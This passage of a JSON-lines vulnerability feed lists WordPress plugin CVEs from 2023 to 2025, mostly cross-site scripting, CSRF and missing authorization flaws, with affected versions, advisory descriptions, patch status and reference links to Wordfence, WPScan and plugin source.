999%40ht-mega-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3943","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_addcomment function. This makes it possible for unauthenticated attackers to add comments to to do items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f6bd7-f57f-4725-a36f-9846ac04f945?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f6bd7-f57f-4725-a36f-9846ac04f945?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3754","slug":"alemha-watermark","versionImpact":"1.3.1","description":"The Alemha watermarker WordPress plugin through 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6f3e3e-3047-4446-a190-750a60c29fa3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6f3e3e-3047-4446-a190-750a60c29fa3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3608","slug":"product-designer","versionImpact":"1.0.33","description":"The Product Designer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the product_designer_ajax_delete_attach_id() function in all versions up to, and including, 1.0.33. This makes it possible for unauthenticated attackers to delete arbitrary attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f127fe5-67b8-40e1-a916-c607410b08b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f127fe5-67b8-40e1-a916-c607410b08b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-designer\\\/trunk\\\/includes\\\/designer-function.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-designer\\\/trunk\\\/includes\\\/designer-function.php#L412\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9444","slug":"element-ready-lite","versionImpact":"6.4.3","description":"The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bea7a4d0-d589-420b-a4ff-eaccf12e623b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bea7a4d0-d589-420b-a4ff-eaccf12e623b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/helper_functions.php#L1559\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/helper_functions.php#L1559\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167864\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167864\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12076","slug":"brid-video-easy-publish","versionImpact":"3.8.3","description":"The Target Video Easy Publish plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.3. This is due to missing or incorrect nonce validation on the resync_carousel(), seek_snapshot(), uploaded_cc(), and remove_cc() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1169\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1185\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L1185\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L465\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L465\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridHtml.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/192b8ab0-f80e-4c0e-9cc0-df567d5791a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/192b8ab0-f80e-4c0e-9cc0-df567d5791a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13669","slug":"calendapp","versionImpact":"1.1","description":"The CalendApp WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71e69cf2-7d41-479c-9721-662b57571c90\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71e69cf2-7d41-479c-9721-662b57571c90\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13891","slug":"schedule","versionImpact":"1.0.0","description":"The Schedule WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c8b73c-3a29-4a66-9b2e-f24b5c2769ac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c8b73c-3a29-4a66-9b2e-f24b5c2769ac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4188","slug":"advanced-reorder-image-text-slider","versionImpact":"1.0","description":"The Advanced Reorder Image Text Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'reorder-simple-image-text-slider-setting' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-reorder-image-text-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-reorder-image-text-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb8a509-9acd-457c-8cb9-725f615148ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb8a509-9acd-457c-8cb9-725f615148ce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7658","slug":"temporarily-hidden-content","versionImpact":"1.0.6","description":"The Temporarily Hidden Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'temphc-start' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/includes\\\/class-temporarily-hidden-content-public.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/includes\\\/class-temporarily-hidden-content-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/templates\\\/countdown_view.tpl\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/templates\\\/countdown_view.tpl\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67afe49c-3560-414b-b848-b91a03bf7556?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67afe49c-3560-414b-b848-b91a03bf7556?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0212","slug":"advanced-recent-posts","versionImpact":"0.6.14","description":"The Advanced Recent Posts WordPress plugin through 0.6.14 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fdd44aa-7f3f-423a-9fb0-dc9dc36f33a3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fdd44aa-7f3f-423a-9fb0-dc9dc36f33a3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5905","slug":"demomentsomtres-wp-export","versionImpact":"20220825","description":"The DeMomentSomTres WordPress Export Posts With Images WordPress plugin through 20220825 does not check authorization of requests to export the blog data, allowing any logged in user, such as subscribers to export the contents of the blog, including restricted and unpublished posts, as well as passwords of protected posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f94e91ef-1773-476c-9945-37e89ceefd3f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f94e91ef-1773-476c-9945-37e89ceefd3f\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3277","slug":"yumpu-epaper-publishing","versionImpact":"2.0.24","description":"The Yumpu ePaper publishing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_handler function in all versions up to, and including, 2.0.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload PDF files and publish them, as well as modify the API key.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed507ac7-6732-4315-99dd-0a8636cc9cc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed507ac7-6732-4315-99dd-0a8636cc9cc3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/trunk\\\/yumpu.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/trunk\\\/yumpu.php#L259\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6226","slug":"wpstickybar-sticky-bar-sticky-header","versionImpact":"2.1.0","description":"The WpStickyBar  WordPress plugin through 2.1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e42ce8dc-51d4-471d-b3bb-ad2a6b735d02\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e42ce8dc-51d4-471d-b3bb-ad2a6b735d02\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11201","slug":"mycred","versionImpact":"2.7.5.2","description":"The myCred \u2013 Loyalty Points and Rewards plugin for WordPress and WooCommerce \u2013 Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mycred\\\/tags\\\/2.7.5\\\/includes\\\/shortcodes\\\/mycred_send.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mycred\\\/tags\\\/2.7.5\\\/includes\\\/shortcodes\\\/mycred_send.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203071\\\/mycred\\\/trunk\\\/includes\\\/shortcodes\\\/mycred_send.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203071\\\/mycred\\\/trunk\\\/includes\\\/shortcodes\\\/mycred_send.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11825","slug":"broadstreet","versionImpact":"1.50.3","description":"The Broadstreet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018zone\u2019 parameter in all versions up to, and including, 1.50.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broadstreet\\\/tags\\\/1.50.1\\\/Broadstreet\\\/Utility.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broadstreet\\\/tags\\\/1.50.1\\\/Broadstreet\\\/Utility.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broadstreet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broadstreet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aeda43bc-eeee-463d-80b7-dec7975b4d19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aeda43bc-eeee-463d-80b7-dec7975b4d19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13634","slug":"post-sync","versionImpact":"1.1","description":"The Post Sync WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e60bf74-19fb-441c-85a8-005def36af9a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e60bf74-19fb-441c-85a8-005def36af9a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13885","slug":"wp-e-customers","versionImpact":"0.0.1","description":"The WP e-Customers Beta WordPress plugin through 0.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b64d17d6-8416-476e-ad78-b7b9cb85b84f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b64d17d6-8416-476e-ad78-b7b9cb85b84f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2544","slug":"ai-content-pipelines","versionImpact":"1.6","description":"The AI Content Pipelines plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-content-pipelines\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-content-pipelines\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b93214ec-5738-4f10-b48c-1d74aad52acb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b93214ec-5738-4f10-b48c-1d74aad52acb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4172","slug":"vertical-response-newsletter-widget","versionImpact":"1.6","description":"The VerticalResponse Newsletter Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'verticalresponse' shortcode in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-response-newsletter-widget\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-response-newsletter-widget\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0565cdf1-55fe-4676-8529-8c79be5e8b01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0565cdf1-55fe-4676-8529-8c79be5e8b01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7655","slug":"live-stream-badger","versionImpact":"1.4.3","description":"The Live Stream Badger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'livestream' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/shortcode\\\/class-embedded-stream.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/shortcode\\\/class-embedded-stream.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/view\\\/class-embedded-twitch-view.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/view\\\/class-embedded-twitch-view.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a30301-f409-4c53-84d7-7799fb41c25b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a30301-f409-4c53-84d7-7799fb41c25b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-22721","slug":"oi-yamaps","versionImpact":"3.2.7","description":"Auth. Stored Cross-Site Scripting (XSS) in Oi Yandex.Maps for WordPress <= 3.2.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/oi-yamaps\\\/wordpress-oi-yandex-maps-for-wordpress-plugin-3-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/oi-yamaps\\\/wordpress-oi-yandex-maps-for-wordpress-plugin-3-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0165","slug":"nd-projects","versionImpact":"1.8","description":"The Cost Calculator WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00b82f7-d8ad-4f6b-b791-81cc16b6336b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00b82f7-d8ad-4f6b-b791-81cc16b6336b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5210","slug":"amp-plus","versionImpact":"3.0","description":"The AMP+ Plus WordPress plugin through 3.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c3ff47a-12a5-49c1-a166-2c57e5c0d0aa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c3ff47a-12a5-49c1-a166-2c57e5c0d0aa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4925","slug":"yikes-inc-easy-mailchimp-extender","versionImpact":"6.8.10","description":"The Easy Forms for Mailchimp WordPress plugin through 6.8.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b094cba-9288-4c9c-87a9-bdce286fe8b6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b094cba-9288-4c9c-87a9-bdce286fe8b6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3603","slug":"osm","versionImpact":"6.0.2","description":"The OSM \u2013 OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'osm_map' shortcode in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping on user supplied attributes such as 'theme'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/845cea77-ea74-4459-817b-cfbdb877b75a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/845cea77-ea74-4459-817b-cfbdb877b75a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
